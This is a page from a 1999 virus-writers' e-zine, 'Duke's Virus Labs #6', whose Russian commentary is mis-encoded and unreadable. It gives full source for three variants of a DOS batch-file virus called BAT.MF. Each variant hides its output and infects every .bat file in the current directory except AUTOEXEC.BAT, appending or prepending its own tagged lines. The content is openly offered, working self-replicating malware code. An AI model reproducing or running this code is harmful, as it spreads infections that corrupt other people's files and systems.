- [Duke's Virus Labs #6] - [Page 03] -

⢮ BAT.MF
(c) by Duke/SMF

     : BAT.MF.227, 251, 282
         : Duke/SMF
 ண.   : DOS-script
 ᮧ : 07.03.99

   த ਨ  ࠧ᪨ BAT-ᮢ, ᠭ 
஬ -  ;))   ஢ 䠩  ࠦ,  ࠦ
䠩 AUTOEXEC.BAT, ᯮ ⨫ FIND  ࠧ   "SMF".
  ࠧ ।  ᫥ 쪮:

     : BAT.MF.251
 䠩     : smf_1.bat
ࠦ 䠩, 뢠  .

===== Cut here =====
@ctty nul%SMF%
if "%1=="SMF goto SMFz
echo.>SMF
find "SMF"<%0>>SMF
for %%b in (*.bat) do if not %%b==AUTOEXEC.BAT call %0 SMF %%b
del SMF
goto SMFe
:SMFz
find "SMF"<%2
if not errorlevel 1 goto SMFe
type SMF>>%2
:SMFe BAT.SMF by Duke/SMF
===== Cut here =====

     : BAT.MF.227
 䠩     : smf_2.bat
ࠦ 䠩, 뢠  .

===== Cut here =====
@ctty nul%SMF%
if "%1=="SMF goto SMFz
echo.>SMF
find "SMF"<%0>>SMF
for %%b in (*.bat) do if not %%b==AUTOEXEC.BAT call %0 SMF %%b
del SMF
goto SMFe
:SMFz
find "SMF"<%2
if errorlevel 1 type SMF>>%2
:SMFe [Duke/SMF]
===== Cut here =====

     : BAT.MF.282
 䠩     : smf_3.bat
ࠦ 䠩, 뢠  砫.

===== Cut here =====
@ctty nul%SMF%
if "%1=="@ goto SMFz
find "SMF"<%0>SMF.bat
for %%b in (*.bat) do if not %%b==AUTOEXEC.BAT call SMF.bat @ %%b
del SMF.*
ctty con%SMF%
@goto SMF
:SMFz
find "SMF"<%2
if not errorlevel 1 goto SMF
type %2>SMF.1
type SMF.bat>%2
type SMF.1>>%2
:SMF [Duke/SMF]
===== Cut here =====
